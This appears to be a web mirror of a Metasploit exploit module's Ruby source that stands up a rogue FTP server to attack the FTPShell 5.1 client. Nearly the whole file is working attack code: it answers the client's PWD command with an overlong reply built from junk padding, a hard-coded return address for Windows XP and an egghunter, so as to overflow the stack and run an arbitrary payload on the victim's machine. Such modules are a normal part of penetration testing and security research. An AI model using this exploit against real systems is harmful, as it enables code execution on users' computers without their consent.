Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Exploit::Remote::FtpServer

10
  include Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FTPShell 5.1 Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets

19
          triggered when the ftp client tries to process an overly long response to a PWD

20
          command. This will overwrite the saved EIP and structured exception handler.

21
        },

22
        'Author' => [

23
          'corelanc0d3r <peter.ve[at]corelan.be>'	# found bug, wrote the exploit

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'OSVDB', '68639'],

28
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],

29
        ],

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'thread',

32
        },

33
        'Payload' => {

34
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38
          [ 'Windows XP Universal', { 'Offset' => 399, 'Ret' => 0x779A5483 } ], # jmp ebp [setupapi.dll]]

39
        ],

40
        'Privileged' => false,

41
        'DisclosureDate' => '2010-10-12',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50
  end

51


52
  def setup

53
    super

54
  end

55


56
  def on_client_unknown_command(c, cmd, arg)

57
    c.put("200 OK\r\n")

58
  end

59


60
  def on_client_command_pwd(c, arg)

61
    badchars = ""

62
    eggoptions =

63
      {

64
        :checksum => true,

65
        :eggtag => "w00t"

66
      }

67
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)

68


69
    print_status(" - PWD command -> Sending payload")

70
    junk = "A" * target['Offset']

71
    nops = "A" * 10

72
    tweakhunter = "\x5a\x5a"

73
    eip = [target.ret].pack('V')

74
    buffer = junk + eip + nops + tweakhunter + hunter + egg

75
    pwdoutput = "257  \"/" + buffer + "\" is current directory\r\n"

76
    c.put(pwdoutput)

77
    print_status(" - Sent #{pwdoutput.length} bytes, wait for hunter")

78
    return

79
  end

80
end

81


82